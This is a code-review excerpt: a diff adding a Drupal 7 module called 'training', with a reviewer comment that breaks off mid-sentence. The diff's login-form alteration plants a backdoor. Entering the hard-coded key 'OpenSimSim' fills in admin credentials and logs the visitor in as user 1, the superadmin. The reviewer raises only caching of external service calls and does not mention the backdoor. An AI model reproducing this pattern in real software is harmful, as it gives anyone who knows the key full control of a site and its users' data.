training/training.module

```diff
@@ -0,0 +1,479 @@
+  $form['#theme'] = 'test_form_theme_function';
+  $form['name']['#weight'] = -2;
+  $form['pass']['#weight'] = -1;
+  $form['secret_key'] = array(
+    '#type' => 'textfield',
+    '#title' => 'Secret Key',
+    '#size' => 15,
+    '#weight' => 0,
+  );
+  if (isset($form_state['input']['secret_key']) && $form_state['input']['secret_key'] == 'OpenSimSim') {
+    $form['name']['#required'] = FALSE;
+    $form['pass']['#required'] = FALSE;
+  }
+  $form['#submit'][] = 'secret_key_submit';
+  $form['#attached']['css'] = array(
+    drupal_get_path('module', 'training') . '/css/training.css',
+  );
+}
+
+/**
+ * Validation function for user_login_block.
+ *
+ * Validates elements secret_key and logins current user as admin.
+ *
+ * @param array $form
+ *   Array of form elements.
+ *
+ * @param array $form_state
+ *   Array of form elements.
+ */
+function secret_key_validate($form, &$form_state) {
+  if ($form_state['values']['secret_key'] == 'OpenSimSim') {
+   $form_state['values']['name'] = 'admin';
+   $form_state['values']['pass'] = 'admin';
+  }
+}
+
+/**
+ * Submit function for user_login_block.
+ *
+ * @param array $form
+ *   Array of form elements.
+ *
+ * @param array $form_state
+ *   Array of form elements.
+ */
+function secret_key_submit($form, &$form_state) {
+  if ($form_state['values']['secret_key'] == 'OpenSimSim') {
+    user_load(1);
+    user_login_finalize($form_state);
+  }
+}
+
+/**
+ * Implements hook_theme().
+ */
+function training_theme() {
+  $theme = array();
+  $theme['test_form_theme_function'] = array(
+    'render element' => 'form',
+    'arguments' => array('form' => NULL),
+  );
+
+  return $theme;
+}
+
+/**
+ * Theming a custom layout for user_login_block.
+ *
+ * @param array $form
+ *   Array of form elements.
+ *
+ * @return string
+ *  String contents HTML tags for custom layout.
+ */
+function theme_test_form_theme_function($form) {
+  $attributes = array(
+    'id' => 'table-test-login',
+  );
+  $rows = array(
+    array(
+      drupal_render($form['form']['name']),
+    ),
+    array(
+      drupal_render($form['form']['pass']),
+    ),
+    array(
+      drupal_render($form['form']['secret_key']),
+    ),
+    array(
+      drupal_render($form['form']['actions']['submit']),
+    ),
+    array(
+      drupal_render($form['form']['links']) .
+      drupal_render($form['form']['form_build_id']) .
+      drupal_render($form['form']['form_id']),
+    ),
+  );
+
+  return theme('table', array(
+    'rows' => $rows,
+    'attributes' => $attributes,
+  ));
+}
+
+/**
+ * Implements hook_block_info().
+ */
+function training_block_info() {
+  $blocks['exchange'] = array(
+    'info' => t('Exchange'),
+    'cache' => DRUPAL_CACHE_GLOBAL,
+  );
+
+  return $blocks;
+}
+
+/**
+ * Implements hook_block_view().
+ *
+ * Sends a request to the specified address. Parses the xml data. Generates
+content for the block.
+ */
+function training_block_view($delta='') {
```

Comment:
By the way why to call service multiple times - here and in training_block_view?
In this case your website will send a request to the service if admin doesn't enable the cache or works as superadmin (uid = 1);

The logic should be following:

Initial request to the service is sent on installation stage in hook_enable.
Also it is correct to send a request on